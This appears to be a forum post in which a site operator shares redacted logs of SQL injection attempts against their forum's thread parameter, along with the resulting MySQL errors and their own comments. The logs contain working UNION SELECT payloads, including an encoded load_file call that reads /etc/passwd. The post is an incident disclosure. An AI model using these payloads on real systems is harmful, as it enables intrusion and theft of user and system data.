This is a quote of our logfiles, IP's have been removed.
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%201,2,3%20FROM%20lol--
Error:MySqlError(1146) in query 'SELECT *, `challid` AS `foo` FROM `threads` WHERE `threadid`=NULL UNION SELECT 1,2,3 FROM lol-- AND (`challid`='0' OR (SELECT `challid` FROM `solved` WHERE `userid`='0' AND `challid`=`foo`)) LIMIT 1': Table '' doesn't exist.
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%201,2,3,4%20FROM%20users--
Error:MySqlError(1222) in query 'SELECT *, `challid` AS `foo` FROM `threads` WHERE `threadid`=NULL UNION SELECT 1,2,3,4 FROM users-- AND (`challid`='0' OR (SELECT `challid` FROM `solved` WHERE `userid`='0' AND `challid`=`foo`)) LIMIT 1': The used SELECT statements have a different number of columns.
now he was trying to guess the number of returned columns
btw: mysql errors were reported to the attacker as shown in the logs
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%20username,username,username,username,username,username,username,username,username,username,username%20FROM%20users--
Error:MySqlError(1054) in query 'SELECT COUNT(*) FROM `posts` WHERE `threadid`=alt3rn4tiv3 LIMIT 1': Unknown column 'alt3rn4tiv3' in 'where clause'.
the one above looks really weird to me, and i am a clueless why "alt3rn4tiv3" is shown :s
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%20load_file(CHAR(47,%20101,%20116,%2099,%2047,%20112,%2097,%20115,%20115,%20119,%20100,%2047)),2,3,4,username,username,username,username,username,username,username%20FROM%20users%20WHERE%20userid%20=%2081--
Error:MySqlError(1064) in query 'SELECT COUNT(*) FROM `posts` WHERE `threadid`= LIMIT 1': You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1.
And this one was the last for now
I hope i really got lucky and no harm was caused.